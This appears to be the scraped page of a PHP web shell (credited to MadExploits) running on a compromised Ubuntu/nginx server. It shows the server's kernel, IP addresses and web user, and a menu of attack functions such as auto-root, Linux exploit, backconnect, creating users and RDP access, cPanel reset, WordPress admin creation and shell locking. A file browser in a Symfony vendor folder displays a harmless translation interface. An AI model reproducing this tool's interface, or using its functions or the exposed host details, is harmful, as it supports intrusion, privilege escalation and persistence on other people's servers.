Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
new_tlmf /
vendor /
symfony /
translation /
[ HOME SHELL ]
Name
Size
Permission
Action
Catalogue
[ DIR ]
drwxrwxr-x
Command
[ DIR ]
drwxrwxr-x
DataCollector
[ DIR ]
drwxrwxr-x
DependencyInjection
[ DIR ]
drwxrwxr-x
Dumper
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Extractor
[ DIR ]
drwxrwxr-x
Formatter
[ DIR ]
drwxrwxr-x
Loader
[ DIR ]
drwxrwxr-x
Provider
[ DIR ]
drwxrwxr-x
Reader
[ DIR ]
drwxrwxr-x
Resources
[ DIR ]
drwxrwxr-x
Test
[ DIR ]
drwxrwxr-x
Util
[ DIR ]
drwxrwxr-x
Writer
[ DIR ]
drwxrwxr-x
CHANGELOG.md
7.27
KB
-rw-rw-r--
CatalogueMetadataAwareInterfac...
1.46
KB
-rw-rw-r--
DataCollectorTranslator.php
4.42
KB
-rw-rw-r--
IdentityTranslator.php
661
B
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
LocaleSwitcher.php
1.83
KB
-rw-rw-r--
LoggingTranslator.php
3.48
KB
-rw-rw-r--
MessageCatalogue.php
9.81
KB
-rw-rw-r--
MessageCatalogueInterface.php
3.4
KB
-rw-rw-r--
MetadataAwareInterface.php
1.38
KB
-rw-rw-r--
PseudoLocalizationTranslator.p...
10.86
KB
-rw-rw-r--
README.md
1.01
KB
-rw-rw-r--
TranslatableMessage.php
1.51
KB
-rw-rw-r--
Translator.php
14.11
KB
-rw-rw-r--
TranslatorBag.php
3.05
KB
-rw-rw-r--
TranslatorBagInterface.php
917
B
-rw-rw-r--
composer.json
1.89
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MetadataAwareInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Translation; /** * This interface is used to get, set, and delete metadata about the translation messages. * * @author Fabien Potencier <fabien@symfony.com> */ interface MetadataAwareInterface { /** * Gets metadata for the given domain and key. * * Passing an empty domain will return an array with all metadata indexed by * domain and then by key. Passing an empty key will return an array with all * metadata for the given domain. * * @return mixed The value that was set or an array with the domains/keys or null */ public function getMetadata(string $key = '', string $domain = 'messages'): mixed; /** * Adds metadata to a message domain. * * @return void */ public function setMetadata(string $key, mixed $value, string $domain = 'messages'); /** * Deletes metadata for the given key and domain. * * Passing an empty domain will delete all metadata. Passing an empty key will * delete all metadata for the given domain. * * @return void */ public function deleteMetadata(string $key = '', string $domain = 'messages'); }
Close